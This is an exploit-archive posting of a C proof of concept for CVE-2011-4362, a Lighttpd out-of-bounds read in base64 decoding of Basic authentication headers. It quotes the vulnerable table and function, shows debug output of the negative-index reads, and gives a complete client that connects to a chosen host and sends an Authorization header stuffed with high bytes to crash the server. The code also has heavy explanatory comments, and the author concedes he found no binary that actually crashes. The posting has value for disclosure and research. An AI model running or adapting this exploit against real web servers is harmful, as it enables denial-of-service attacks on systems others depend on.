
Lighttpd 1.4.30 / 1.5 Denial Of Service

Lighttpd 1.4.30 / 1.5 Denial Of Service
Posted Dec 26, 2011
Authored by Adam Zabrocki

Out-of-bounds read / segmentation fault denial of service exploit for Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806.

tags | exploit, denial of service
advisories | CVE-2011-4362
MD5 | 795e08f4506c35082c983971a9d04cc2

/*
* Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang
*
* Here the vulnerable code (src/http_auth.c:67)
*
* --- CUT ---
* static const short base64_reverse_table[256] = {
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F
* 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F
* -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F
* 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F
* -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F
* 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF
* -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF
* };
*
* static unsigned char * base64_decode(buffer *out, const char *in) {
* ...
* int ch, ...;
* size_t i;
* ...
*
* ch = in[i];
* ...
* ch = base64_reverse_table[ch];
* ...
* }
* --- CUT ---
*
* Because variable 'in' is of type 'char', characters above 0x80 lead to negative indices.
* This vulnerability may lead to an out-of-bounds read and theoretically cause a Segmentation Fault
* (Denial of Service attack). Unfortunately I couldn't find any binaries where the .rodata
* section before the base64_reverse_table table causes this situation.
*
* I have added some extra debug output to the lighttpd source code to see whether this vulnerability is
* triggered correctly. Here is the output for one example:
*
* --- CUT ---
* ptr[0x9a92c48] size[0xc0] used[0x0]
* 127(. | 0 | 0)
* -128(t | 1 | 0)
* -127(e | 2 | 1)
* -126(' | 3 | 2)
* -125(e | 4 | 3)
* -124(u | 5 | 3)
* -123(r | 6 | 4)
* -122(' | 7 | 5)
* -121(s | 8 | 6)
* -120(c | 9 | 6)
* -119(i | 10 | 7)
* -118(n | 11 | 8)
* -117(i | 12 | 9)
* -116( | 13 | 9)
* -115(a | 14 | 10)
* -114(t | 15 | 11)
* -113(. | 16 | 12)
* -112(e | 17 | 12)
* -111(u | 18 | 13)
* -110(r | 19 | 14)
* -109(' | 20 | 15)
* -108(f | 21 | 15)
* -107(i | 22 | 16)
* -106(e | 23 | 17)
* -105(: | 24 | 18)
* -104(= | 25 | 18)
* -103(o | 26 | 19)
* -102(t | 27 | 20)
* -101(o | 28 | 21)
* -100( | 29 | 21)
* -99(a | 30 | 22)
* -98(g | 31 | 23)
* -97(. | 32 | 24)
* -96(d | 33 | 24)
* -95(g | 34 | 25)
* -94(s | 35 | 26)
* -93(: | 36 | 27)
* -92(u | 37 | 27)
* -91(s | 38 | 28)
* -90(p | 39 | 29)
* -89(o | 40 | 30)
* -88(t | 41 | 30)
* -87(d | 42 | 31)
* -86(b | 43 | 32)
* -85(c | 44 | 33)
* -84(e | 45 | 33)
* -83(d | 46 | 34)
* -82(( | 47 | 35)
* -81(n | 48 | 36)
* -80(y | 49 | 36)
* -79(h | 50 | 37)
* -78(d | 51 | 38)
* -77(g | 52 | 39)
* -76(s | 53 | 39)
* -75( | 54 | 40)
* -74(r | 55 | 41)
* -73(p | 56 | 42)
* -72(a | 57 | 42)
* -71(n | 58 | 43)
* -70(. | 59 | 44)
* -69(. | 60 | 45)
* -68(d | 61 | 45)
* -67(g | 62 | 46)
* -66(s | 63 | 47)
* -65(: | 64 | 48)
* -64(( | 65 | 48)
* -63(d | 66 | 49)
* -62(- | 67 | 50)
* -61(e | 68 | 51)
* -60(s | 69 | 51)
* -59( | 70 | 52)
* -58(i | 71 | 53)
* -57(s | 72 | 54)
* -56(n | 73 | 54)
* -55( | 74 | 55)
* -54(i | 75 | 56)
* -53(l | 76 | 57)
* -52(. | 77 | 57)
* -51(. | 78 | 58)
* -50(k | 79 | 59)
* -49(0 | 80 | 60)
* -48(% | 81 | 60)
* -47(] | 82 | 61)
* -46(p | 83 | 62)
* -45(r | 84 | 63)
* -44(0 | 85 | 63)
* -43(% | 86 | 64)
* -42(] | 87 | 65)
* -41(s | 88 | 66)
* -40(z | 89 | 66)
* -39([ | 90 | 67)
* -38(x | 91 | 68)
* -37(x | 92 | 69)
* -36( | 93 | 69)
* -35(s | 94 | 70)
* -34(d | 95 | 71)
* -33(0 | 96 | 72)
* -32(% | 97 | 72)
* -31(] | 98 | 73)
* -30(. | 99 | 74)
* -29(. | 100 | 75)
* -28(d | 101 | 75)
* -27(c | 102 | 76)
* -26(d | 103 | 77)
* -25(i | 104 | 78)
* -24(g | 105 | 78)
* -23(b | 106 | 79)
* -22(s | 107 | 80)
* -21(6 | 108 | 81)
* -20(- | 109 | 81)
* -19(t | 110 | 82)
* -18(i | 111 | 83)
* -17(g | 112 | 84)
* -16(f | 113 | 84)
* -15(i | 114 | 85)
* -14(e | 115 | 86)
* -13(. | 116 | 87)
* -12(. | 117 | 87)
* -11(. | 118 | 88)
* -10(. | 119 | 89)
* -9(. | 120 | 90)
* -8(. | 121 | 90)
* -7(. | 122 | 91)
* -6(. | 123 | 92)
* -5(. | 124 | 93)
* -4(. | 125 | 93)
* -3(. | 126 | 94)
* -2(. | 127 | 95)
* -1(. | 128 | 96)
* k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]
* ptr[0x9a92c48] size[0xc0] used[0x60]
* string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]
* --- CUT ---
*
* The first column is the offset, so the vulnerability is triggered as it should be
* (negative offsets). The second column is the byte which is read out-of-bounds.
*
*
* Maybe you can find a vulnerable binary?
*
*
* Best regards,
* Adam 'pi3' Zabrocki
*
*
* --
* http://pi3.com.pl
* http://site.pi3.com.pl/exp/p_cve-2011-4362.c
* http://blog.pi3.com.pl/?p=277
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <getopt.h>

#define PORT 80                 /* Default port; only used to initialize i in main(). */
#define SA struct sockaddr      /* Shorthand for the cast passed to connect(). */

/*
 * Request template used when the target port is exactly 80.
 * Format arguments, in order: remote directory (becomes the request path),
 * host name. The "Authorization: Basic " line is deliberately left open:
 * main() appends the raw credential bytes and the closing CRLF CRLF itself,
 * so this literal must not end with "\r\n". All other headers are fixed
 * browser-like values.
 */
char header[] =
"GET /%s/ HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Proxy-Connection: keep-alive\r\n"
"Authorization: Basic ";

/*
 * Same template for any port other than 80. Takes a third format argument
 * (the port, as int) for the Host header; otherwise identical to header[].
 */
char header_port[] =
"GET /%s/ HTTP/1.1\r\n"
"Host: %s:%d\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"Proxy-Connection: keep-alive\r\n"
"Authorization: Basic ";


/*
 * Entry point. Builds one HTTP GET request whose "Authorization: Basic"
 * value is padded with the bytes 127..255 (plus one wrapped byte) and
 * sends it to the host/port given on the command line. Those high bytes
 * are what produce the negative table index described in the header
 * comment above.
 *
 * Options (see the getopt string below): -h <host>, -p <port>, -d <dir>.
 * Note that usage() advertises "-v <victim>" while the parser only
 * accepts "-h".
 *
 * usage() is defined after main() without a prior prototype, and
 * write()/close() are used without including <unistd.h>, so this file
 * relies on implicit function declarations (removed from the language in
 * C99; compilers may warn or reject). main() has no explicit return; every
 * error path calls exit(-1).
 */
int main(int argc, char *argv[]) {

/* i holds the port number first, then is reused as a loop counter. */
int i=PORT,opt=0,sockfd;
char *remote_dir = NULL;
char *r_hostname = NULL;
struct sockaddr_in servaddr;    /* never memset: sin_zero stays uninitialized */
struct hostent *h = NULL;
char *buf;
unsigned int len = 0x0;


/* No arguments at all: usage() prints help and exits. */
if (!argv[1])
usage(argv[0]);


printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n");
printf("\n\t\t[+] Preparing arguments... ");
while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {
switch(opt) {

case 'h':

/* Resolved immediately; h stays NULL if -h is never given.
 * strdup() results are never freed (process exits shortly). */
r_hostname = strdup(optarg);
if ( (h = gethostbyname(r_hostname))==NULL) {
printf("Gethostbyname() field!\n");
exit(-1);
}
break;

case 'p':

/* atoi(): no validation. Non-numeric input yields 0; values above
 * 65535 are truncated when passed to htons() below. */
i=atoi(optarg);
break;

case 'd':

remote_dir = strdup(optarg);
break;

case '?':

/* getopt() also returns '?' for unknown options / missing arguments. */
usage(argv[0]);
break;

default:

usage(argv[0]);
break;

}
}

/* Both -d and -h are mandatory. usage() calls exit(0) itself, so the
 * exit(-1) that follows is never reached. */
if (!remote_dir || !h) {
usage(argv[0]);
exit(-1);
}

servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(i);
/* First address of the lookup (h_addr is h_addr_list[0]); IPv4 only. */
servaddr.sin_addr = *(struct in_addr*)h->h_addr;

/* Sized from the longer template; the 512 bytes of slack cover the 130
 * bytes appended below plus the closing CRLF CRLF. buf is never freed. */
len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;
if ( (buf = (char *)malloc(len)) == NULL) {
printf("malloc() :(\n");
exit(-1);
}
/* Zero-fill so the strlen()-based appends below always find a terminator. */
memset(buf,0x0,len);

/* The literal 80 is compared here, not the PORT macro, so "-p 80" also
 * selects the short Host form. */
if (i != 80)
snprintf(buf,len,header_port,remote_dir,r_hostname,i);
else
snprintf(buf,len,header,remote_dir,r_hostname);

/* Append the values 127..256 converted to char: 127 is 0x7F, 128..255 are
 * the bytes that become negative when read through a signed char (the
 * negative table index from the header comment), and 256 wraps to 0 on an
 * 8-bit char (implementation-defined), so the last store just rewrites the
 * terminator. Each strlen() rescans buf; quadratic but n is tiny. i is
 * reused as the loop counter here; the port is already in servaddr. */
for (i=0;i<130;i++)
buf[strlen(buf)] = 127+i;

/* End of the Authorization line, then the blank line ending the headers. */
buf[strlen(buf)] = '\r';
buf[strlen(buf)] = '\n';
buf[strlen(buf)] = '\r';
buf[strlen(buf)] = '\n';

printf("OK\n\t\t[+] Creating socket... ");
if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {
printf("Socket() error!\n");
exit(-1);
}

printf("OK\n\t\t[+] Connecting to [%s]... ",r_hostname);
if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {
printf("Connect() error!\n");
exit(-1);
}

printf("OK\n\t\t[+] Sending dirty packet... ");
/* Disabled debug dump of the request to stdout. */
// write(1,buf,strlen(buf));
/* write() return value is ignored: a short write would send a truncated
 * request without any indication. write()/close() need <unistd.h>. */
write(sockfd,buf,strlen(buf));

printf("OK\n\n\t\t[+] Check the website!\n\n");

/* No response is read; the connection is simply closed. */
close(sockfd);

}

/*
 * Print the banner and option summary, then exit(0).
 *
 * arg is argv[0], shown as the program name. This function never returns;
 * its int return type is vestigial. Note that the "-v <victim>" line does
 * not match main()'s getopt string "h:d:p:?", which expects -h instead.
 */
int usage(char *arg) {
	const char *banner =
		"\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n";
	const char *options =
		"\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n";

	/* Neither fixed string contains a conversion specifier, so fputs()
	 * emits exactly what printf() would. */
	fputs(banner, stdout);
	printf("\n\tUsage: %s <options>\n\n\t\tOptions:\n", arg);
	fputs(options, stdout);
	exit(0);
}
